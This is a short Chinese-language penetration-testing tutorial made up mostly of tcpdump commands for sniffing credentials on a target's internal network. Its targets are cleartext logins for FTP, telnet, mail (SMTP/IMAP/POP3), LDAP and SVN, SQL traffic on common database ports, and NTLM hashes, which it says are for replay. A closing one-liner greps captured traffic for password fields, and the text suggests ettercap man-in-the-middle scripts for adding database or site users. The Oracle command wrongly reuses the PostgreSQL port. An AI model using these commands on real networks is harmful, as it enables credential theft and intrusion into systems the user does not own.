抓取指定机器的 ftp 明文账号密码(默认端口:21): # tcpdump -i eth0 -nn -s 0 host 192.168.3.196 and tcp dst port 21 # tcpdump -i eth0 -s 0 -U host 192.168.3.196 and tcp dst port 21 -w ftp_pass.pcap 直接把包写到文件中,留存后续分析
1 2
抓取 telnet 的登录账号密码,抓路由也许用得到[不过现在貌似大多数都换成ssl了(ssh)](默认端口:23): # tcpdump -vv -i eth0 -nn -s 0 host 192.168.3.196 and dst port 23 -w telnet_pass.pcap
1 2 3
抓取网络中的sql语句,运气好的话兴趣还能抓到数据库的用户账号密码,当然,你可以通过自己写ettercap脚本对这些语句做一进一步的中间人利用[增删改查],比如权限够的情况下,可以尝试添加数据库用户,添加网站用户,等等……,因为sql都是明文传输,所以如果利用好了危害还是非常大的,不过这并不是今天的重点,我们今天还是想要简要说明下tcpdump在实战中的一些基本用途,至于那些中间人用户,抽空会再详细说明,不过实战中利用起来还是比较困难的,除非你自己的机器直接就正常的处在目标内网[比如,vpn内网,无线……]中,如果是这样,利用起来还是蛮舒服的 抓取 mysql 的增删改查sql(默认端口3306): # tcpdump -i eth0 -s 0 -XX dst port 3306 and dst host 192.168.3.23
1 2
抓取 mssql 的增删改查sql(默认端口1433): # tcpdump -i eth0 -s 0 -XX dst port 1433 and dst host 192.168.3.23
1 2
抓取 pgsql 的增删改查sql默认端口5432): # tcpdump -i eth0 -s 0 -XX dst port 5432 and dst host 192.168.3.23
1 2
抓取 oracle 的增删改查sql(默认端口1521),后面就不一一截图了,累: # tcpdump -i eth0 -s 0 -XX dst port 5432 and dst host 192.168.3.23
1 2
截获win内网的 ntlm hash(主要是为了重放): # tcpdump -i eth0 -s 0 -XX 'dst port 445 and dst host 192.168.3.23'
1 2
smtp(默认端口:25) /imap(默认端口:143) /pop3(默认端口:110) 抓取各类邮箱明文登录密码(如果是带s的,这样是抓不到的哦): # tcpdump -i eth0 -s 0 -XX '(dst port 25 or dst port 143 or dst port 110) and dst host 192.168.3.30'
1 2
ldap(默认端口:389): # tcpdump -nn -vv -A -i eth0 -s 0 -w /shared/tmp/ldap.cap dst host 192.168.3.23 and dst port 389
1 2
svn(默认端口:3690): # tcpdump -i eth0 -s 0 -A dst port 3690 and dst host 192.168.3.23
1 2
尝试一句话tcpdump 截获内网中的各类明文密码数据(实际渗透中,账号密码字段,可以根据目标实际环境[观察目标网站后台的账号密码字段命名习惯]自己多写一些,以增加命中率): # tcpdump port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass|user' --color=auto --line-buffered -B20 -w res_bak.txt